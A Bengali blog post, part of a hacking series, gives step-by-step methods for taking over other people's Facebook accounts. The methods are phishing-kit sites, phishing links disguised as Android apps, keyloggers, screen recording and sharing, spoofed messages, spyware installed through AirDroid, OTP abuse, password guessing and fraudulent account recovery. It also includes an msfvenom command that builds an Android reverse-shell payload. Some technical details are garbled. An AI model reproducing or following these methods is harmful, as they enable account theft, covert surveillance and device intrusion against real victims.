নিয়নবাতি [পর্ব-০৯] ফেসবুক আইডি হ্যাকিং এর সাতকাহন!

জগতে মানুষের মনকে যেহেতু বশ(হ্যাক) করা সম্ভব তাই নিশ্চিত রূপে জেনে থাকুন যে সাইবার জগতে সবকিছু হ্যাক করা সম্ভব (তবে এখানে সহজ আর কঠিন কথাটা মাথায় রাখা উচিত) সুতরাং ১০০% গ্যারান্টি দিলে বলা যায় “ফেসবুক হ্যাক পসিবল”।
ফেসবুক হ্যাক বলতে বোঝায়
(১) সরাসরি ফেসবুক সার্ভার হ্যাক
(২) অন্যের ফেসবুক আইডি হ্যাক
আসুন একটু ডিটেইলস ডিসকাস করা যাক
(১) ফেসবুক সার্ভার হ্যাক: ফেসবুক যেহেতু একটি ওয়েবসাইট তাই এতে ভার্নাবিলিটি( দূর্বলতা) থাকা স্বাভাবিক আর হ্যাকারেরা এই সিকিউরিটির ফাঁকে প্রতিনিয়ত ফেসবুক আইডি হ্যাক করার চেষ্টা করছে। ঠিক এই মুহূর্তে আমি যখন এই আর্টিকেল লিখছি তখন বিশ্বের হাজার তরুণ হ্যাকার ফেসবুক সার্ভারে এট্যাক করার চেষ্টা করছে। তবে জনপ্রিয় ফেসবুক ওয়েবসাইটের অথোরিটি তাদের সিকিউরিটি এতোটাই শক্তিশালী করার চেষ্টারত আছেন যে তাতে প্রায় ৯৯.৯৯% হ্যাকারই বিফল হন সেটা তো বলাই বাহুল্য।
আর সবচেয়ে মজার কথা হলো ফেসবুকের সিকিউরিটির অন্যতম এক্সপার্ট হলো পৃথিবীর বেশ নামী দামী হ্যাকারেরা তাই এখানে “চোর যখন পাহারদার তখন দায়িত্বই হলো ঈমানদারী” তাই এক্ষেত্রে ফেসবুক হ্যাক প্রায় অসম্ভব( রিপিট আমি প্রায় বলেছি)।
(২) অন্যের ফেসবুক আইডি হ্যাক: এই কাজটা যারপরনাই সহজ আবার সচেতন ভিক্টিম(যার আইডি হ্যাক করতে চান তিনিই ভিক্টিম) এর ক্ষেত্রে খুবই কঠিন। ফেসবুক একাউন্ট হ্যাক করার কতোগুলা মেথড আছে সেগুলি নিম্নরূপ:
(ক) ফিশিং: যেকোনো ওয়েবসাইট এর নকল পেইজ তৈরী করে ভিক্টিম’কে পাঠিয়ে তাতে লগিন করতে পাম্পিং করার নামই ফিশিং। পূর্বে ওয়াপকাতে সহজভাবে ফেসবুক ফিশিং সাইট তৈরী করা গেলেও বর্তমানে ওয়াপকা ফিশিং সাইট ব্লক করে দেয়। তবে একইভাবে আপনি যেকোনো ফ্রি হোস্টিং সাইট হতে এমন ফিশিং সাইট তৈরী করতে পারেন যেমন www.000webhost.com ইত্যাদি। এছাড়াও অনলাইনে আপনি www.anomor.com অথবা www.shadowave.com ( www.shadowave.info) কিংবা http://z-shadow.info হতে একটি একাউন্ট খুলে সেখান হতে ফিশিং লিংক সংগ্রহ করে ভিক্টিমকে পাঠাতে পারেন এবং ভিক্টিম যদি তাতে লগিন করে তবে আপনার ঐ একাউন্টে তার ইউসার ডিটেইলস(যেমন ইউজার আইডি/ইমেইল) এবং পাসওয়ার্ড পেয়ে যাবেন।
যেহেতু এখন সবাই ফিশিং সম্পর্কে সাম্যক অবগত তাই আপনি উক্ত ফিশিং লিংক হতে একটি এনড্রোয়েড এপ্স বানিয়ে নিতে পারেন যেন ভিক্টিম সরাসরি লিংক’টি সনাক্ত করতে না পারেন।এরকম লিংক হতে এপ্স কনভার্ট করতে পারেন www.web2apk.com কিংবা https://gonative.io/ ইত্যাদি হতে।
(খ) কিলগার: মূলত ভিক্টিমের সকল টাইপিং লেটার পাওয়ার উপায় হলো এই কি লগার যেন ভিক্টিম কি কি টাইপ করছে তা আপনি জানতে পারেন আর ভিক্টিম যদি ফেসবুকে লগিন করে তবে পাসওয়ার্ড টাইপিং করার সময় তা ডিভাইসে(পিসি/মোবাইল) এ সেভ করে রাখার সিস্টেমই হলো কিলগিং।
ধরুন আপনি আপনার ফ্রেন্ডকে বললেন আপনার মোবাইলে অনেক মেগাবাইট আছে সে যেন চাইলে ফেসবুক একাউন্ট ব্যবহার করতে পারে তাহলে আপনার বন্ধু যখন প্রলুব্ধ হয়ে তার একাউন্টে লগিন করবে তখন আপনার ডিভাইসে তার লগিন করা পাসওয়ার্ড সেভ হয়ে থাকবে।
এমনি একটি কিলগার হলো Hackers Keyboard → https://m.apkpure.com/hacker-s-keyboard/org.pocketworkstation.pckeyboard

তবে এডভান্স মেথডে এখন অনেক কিলগার তৈরি করা সম্ভব যাতে দূরের যে কারো ডিভাইসে উক্ত কিলগার ইনস্টল করিয়ে তা হতে রিমোটিক ডাটা এনালাইসিস করা সম্ভব যেমন আপনার কম্পিউটার/এনড্রোয়েডে এমন একটি কিলগার ইনস্টল থাকবে যেন আপনি কি কি টাইপ করছেন সেটার কপি ডিরেক্ট আমি আমার ইমেইলে পেয়ে যাবো।
দিনে দিনে সিকিউরিটি যতো বাড়বে হ্যাকিং ওয়্যেও ততোই বাড়বে।
(গ) স্ক্রিন রেকর্ডার: ঠিক কি লগারের মতোই এমন একটি মেথড হলো স্ক্রিন রেকর্ডার যেখানে ভিক্টিম ডিভাইসে কি করছে তা সরাসরি ভিডিও রেকর্ড হয়ে থাকবে আর সেখান হতেই পাসওয়ার্ড সংগ্রহ করে তার ফেসবুক একাউন্ট হ্যাক করতে পারবেন।
এমনি স্ক্রিন রেকর্ডার এপ্স( রুট+ননরুট) AZ Screen Recorder → https://m.apkpure.com/az-screen-recorder-no-root/com.hecorat.screenrecorder.free
(ঘ) স্ক্রিন শেয়ারিং: ভিক্টিম তার মোবাইলে কি কি করছে তা আপনি দূর হতেই লাইভ দেখতে পারেন স্ক্রিন শেয়ারিং সফটওয়ার হতে; কার্যত এভাবে ভিক্টিমের ফেসবুক আইডির এক্সেস নিতে কিংবা ডিটেইলস জানতে পারেন।
এটি মূলত ইন্টারনেট সংযোগের উপর ভিত্তি করে ভিক্টিম ডিভাইস এবং রিসিভার এর মাঝের তথ্য আদান প্রদান করে আর ফেসবুক চালাতে যেহেতু ইন্টারনেট সংযোগ বাধ্যতামূলক তাই এই পদ্ধতিটি অবলম্বন করা যেতেই পারে( উল্লেখ্য এক্ষেত্রে দুটি ডিভাইসেই একই সফটওয়ার ইনস্টল থাকা বাধ্যতামূলক)।
এমন একটি এপ্স হলো screen Sharing → https://m.apkpure.com/screen-share-oneassistant/nfo.oneassist
(ঙ) স্ফুপিং: ধরুন আপনার মোবাইল যদি সরাসরি ফেসবুক হতে একটি আসে যে ” keep safe your account from hacker by clicking this link http://blablablablabla.com” তাহলে নিশ্চয়ই আপনি তাতে ক্লিক করে দ্বিধাবোধ করবেন না কেননা মেসেজটি তো সরাসরি ফেসবুক হতে এসেছে তাইনা?
ঠিক এভাবে আপনি উক্ত http://blablablablabla.com এর স্থলে ফিশিং লিংক হতে ভিক্টিম আইডির এক্সেস নিতে পারবেন।
এক্ষেত্রে ঐ Facebook হতে আসা মেসেজটি হলো আদতে বাল্ক মেসেজ আর এটাকে আসলে মেসেজ স্পুফিং একইরূপ আপনি ইমেইল স্পুফিং কিংবা কল স্পুফিংও করতে পারেন।
(চ) আইপি এড্রেস: ফেসবুক আইডি হ্যাক করার অন্যতম একটি সহজ উপায় হলো এই আইপি এড্রেস। মূলত আপনার আইপি এড্রেস এবং পোর্ট হতে নিম্নোক্ত কমান্ডে $ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT=port R > /sdcard/test.apk (পিসি হলে লিনাক্স বা উইন্ডোজ এবং এনড্রোয়েড হলে টার্মিনাল) একটি ম্যালওয়েল( মূলত এনড্রোয়েড রিমোটিক এক্সেস)এপ্স বানাতে পারেন যা হতে আপনি ভিক্টিমের এনড্রোয়েডের এক্সেস নিয়ে তা হ্যাক করতে পারবেন।
(ছ) রিমোটিক এক্সেস: হ্যাকার ভিক্টিমের কম্পিউটার/এনড্রোয়েড রিমোটিক এক্সেস নিয়ে তার ফেসবুক আইডি হ্যাক করতে পারেন। মোবাইলের ক্ষেত্রে আপনি নিম্নোক্ত https://web.airdroid.com/ ওয়েবসাইট এর সহায়তায় ভিক্টিম এনড্রোয়েডে আপনি একটি স্পাইয়িং সফটওয়ার ইনস্টল এবং রেজিস্টার করে পরবর্তীতে পাসওয়ার্ড রিসেট করে আপনার একাউন্ট হতে মেসেজ বক্সে আসা রিসেট কোড সংগ্রহ করে তার ফেসবুক একাউন্ট হ্যাক করতে পারেন।
(জ) ওয়ান টাইম পাসওয়ার্ড: ভিক্টিমের ফেসবুকে যুক্ত থাকা মোবাইল নাম্বার হতে আপনি otp লিখে 32665 নাম্বারে মেসেজ করলে ফিরতি মেসেজে একটি টেম্পরারি কোড পাবেন যা হতে ভিক্টিমের একাউন্টে এক্সেস নিতে পারবেন।
উল্লেখ্য এইখানে তার আইডিতে যুক্ত মোবাইল নাম্বারটি জানতে হবে এবং অতি অল্প সময়ের জন্য হলেও সেই নাম্বারটি ব্যবহার করার মতোন অবসর পেতে হবে।
(ঝ) ব্রুটফোর্স: ফেসবুকে যেহেতু ইমেইল আইডি/মোবাইল নাম্বার না জেনেও সরাসরি আইডি কোড/ইউসারনেম এবং পাসওয়ার্ড দিয়ে লগিন করা যায় তাই ফেসবুকে ব্রুটফোর্স এট্যাক খুবই পপুলার হতো; তবে যেহেতু ক্যাপচা সিস্টেম আছে তাই ব্রুটফোর্স কার্যত অচল। তথাপি গেসিং মেথডে ম্যানুয়ালি ভিক্টিম আইডিতে একের পর এক চেষ্টা চালিয়ে গেলে সফলতা আসতে পারে; এক্ষেত্রে পাসওয়ার্ড লিস্ট আপনাকে ভিক্টিম সম্পর্কে তথ্য জেনে তা এনালাইসিস পূর্বক তৈরী করে নিতে জানতে হবে।
আশ্চর্য হলেও সত্য এই কাজটা যেমন সহজ তেমনি ফলপ্রদ তবে আপনার ব্রেইন’কে কঠিন চিজ তৈরী করাটা আপনার দায়িত্ব।
(ঞ) রিকোভারী: ফেসবুকে অন্যের বার্থডে এবং নাম জেনে ডকুমেন্ট সাবমিট করে তাতে এক্সেস নেবার নামই রিকোভারী; আদতে এমন এক্সেস নেবার জন্যই রিকোভারী হতে তা হ্যাকিং নামে পরিচিত। এক্ষেত্রে এমন ডকুমেন্ট সাবমিট করতে হবে যেন তাতে ভিক্টিমের নাম+বার্থডে মিল থাকে( ফেসবুক গ্রহণ করে এমন ডকুমেন্টের ভেতর আছে ন্যাশনাল আইডি কার্ড/পাসপোর্ট/ড্রাইভিং লাইসেন্স ইত্যাদি)। উল্লেখ্য এমনিভাবে করতে অবশ্যই আপনাকে ভিক্টিম সিস্টেমের সহিত আপনার Mac এক্সচেঞ্জ করে নেওয়া উচিত।
আমি পরে এই বিষয়টি নিয়ে আলাদা আরো ডিটেইলস একটি টিউন করবো।
(চ) সেশন হাইজ্যাকিং: ভিক্টিমের একই নেটওয়ার্কে তার ব্রাউজারের কুকিজ হাইজ্যাক করে সরাসরি ফেসবুকে এক্সেস নেওয়ার নামই হলো সেশন হাইজ্যাকিং। বর্তামনে ফেসবুক https:// প্রটোকল ব্যবহার করে এবং http:// রিডিরেক্ট হয় https:// প্রটোকলে তাই এমনটি বর্তমানে অসম্ভব তাই একসময়ের এতো পপুলার ফেসনিফ এপ্স আসলে অকার্যকর। তথাপি একই নেটওয়ার্কে এক্টিভ থাকা দুটি সিস্টেমের একটির ব্রাউজারের কুকিজ হতে ভিন্ন ব্রাউজারে তার কুকিজ হাইজ্যাক করে( সেশন হাইজ্যাক করে) কমপ্লেক্সি হ্যাকিং সম্ভবপর।

শেষকথা: হ্যাকিং বিদ্যার শেষ নাই তবুও আজ হতেই যদি হ্যাকিং শিক্ষার শুরু করেন তবে সফল যে আপনি হবেন-ই-হবেন তা সুনিশ্চিত; সময়টা আজ অথবা কাল তবে শিক্ষা কখনো বিফলে যায়না।

[পূর্বে টিটিসিতে প্রকাশিত আমার লেখা, যার প্রুফ ট্রিকবিডি সাপোর্ট টিম যাচাই করতে পারেন আমার টিউনার আইডির এক্সেস হতে ]
ধন্যবাদ